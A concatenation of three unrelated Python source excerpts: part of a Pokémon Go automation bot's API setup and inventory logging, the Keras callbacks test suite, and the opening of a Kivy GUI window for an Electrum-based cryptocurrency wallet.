self.logger.error(file_name + ' is not found! Please place it in the bots root directory or set encrypt_location in config.')
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.api.activate_signature(self.get_encryption_lib())
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | GreatBalls: ' + str(items_inventory.get(2).count) +
' | UltraBalls: ' + str(items_inventory.get(3).count) +
' | MasterBalls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | BlukBerries: ' + str(items_inventory.get(702).count) +
' | NanabBerries: ' + str(items_inventory.get(703).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count) +
' | TroyDisk: ' + str(items_inventory.get(501).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | SuperPotion: ' + str(items_inventory.get(102).count) +
' | HyperPotion: ' + str(items_inventory.get(103).count) +
' | MaxPotion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | IncenseSpicy: ' + str(items_inventory.get(402).count) +
' | IncenseCool: ' + str(items_inventory.get(403).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | MaxRevive: ' + str(items_inventory.get(202).count))
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
with open(os.path.join(_base_dir, 'data', 'last-location-%s.json' %
self.config.username)) as f:
location_json = json.load(f)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location_name
)
if len(possible_coordinates) >= 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), (float(possible_coordinates[2]) if len(possible_coordinates) == 3 else self.alt)
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold:
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.call()
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
self.update_web_location()
def display_player_info(self):
inventory_items = self.api.get_inventory()
inventory_items = inventory_items['responses']['GET_INVENTORY']['inventory_delta']['inventory_items']
player_stats = next((x["inventory_item_data"]["player_stats"]
for x in inventory_items
if x.get("inventory_item_data", {}).get("player_stats", {})),
None)
if player_stats:
nextlvlxp = (int(player_stats.get('next_level_xp', 0)) - int(player_stats.get('experience', 0)))
if 'level' in player_stats and 'experience' in player_stats:
self.logger.info(
'Level: {level}'.format(
**player_stats) +
' (Next Level: {} XP)'.format(
nextlvlxp) +
' (Total: {experience} XP)'
''.format(**player_stats))
if 'pokemons_captured' in player_stats and 'poke_stop_visits' in player_stats:
self.logger.info(
'Pokemon Captured: '
'{pokemons_captured}'.format(
**player_stats) +
' | Pokestops Visited: '
'{poke_stop_visits}'.format(
**player_stats))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
|
test_callbacks.py
|
import os
import sys
import multiprocessing
import numpy as np
import pytest
from csv import Sniffer
from keras import optimizers
np.random.seed(1337)
from keras import callbacks
from keras.models import Sequential
from keras.layers.core import Dense
from keras.utils.test_utils import get_test_data
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
nb_hidden = 4
nb_class = 2
batch_size = 5
train_samples = 20
test_samples = 20
def test_ModelCheckpoint():
filepath = 'checkpoint.h5'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=4)
assert os.path.exists(filepath.format(epoch=1))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=2))
os.remove(filepath.format(epoch=1))
os.remove(filepath.format(epoch=3))
def test_EarlyStopping():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
def test_EarlyStopping_reuse():
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
def test_LearningRateScheduler():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
def test_CSVLogger():
filepath = 'log.tsv'
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
import re
with open(filepath) as csvfile:
output = " ".join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard():
import shutil
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(
nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
def data_generator_graph(train):
while 1:
if train:
yield {'X_vars': X_train, 'output': y_train}
else:
yield {'X_vars': X_test, 'output': y_test}
# case 1 Sequential
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1)
cbks = [tsb]
# fit with validation data
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
# fit generator with validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
def test_LambdaCallback():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
p.join()
assert not p.is_alive()
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard_with_ReduceLROnPlateau():
import shutil
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
if __name__ == '__main__':
pytest.main([__file__])
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum_vestx.bitcoin import TYPE_ADDRESS
from electrum_vestx.storage import WalletStorage
from electrum_vestx.wallet import Wallet, InternalAddressCorruption
from electrum_vestx.paymentrequest import InvoiceStore
from electrum_vestx.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum_vestx.plugin import run_hook
from electrum_vestx.util import format_satoshis, format_satoshis_plain
from electrum_vestx.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum_vestx import blockchain
from electrum_vestx.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
Window.size = (1080, 1920)
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_vestx.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_vestx.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_vestx.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_vestx.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_vestx_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_vestx.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Montserrat',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Regular.otf',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Regular.otf',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Bold.otf',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Bold.otf')
Label.register('Roboto',
'electrum_vestx/gui/kivy/data/fonts/Roboto.ttf',
'electrum_vestx/gui/kivy/data/fonts/Roboto.ttf',
'electrum_vestx/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_vestx/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_vestx.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on, True)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_vestx import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'vestx':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
#self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Vestx Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
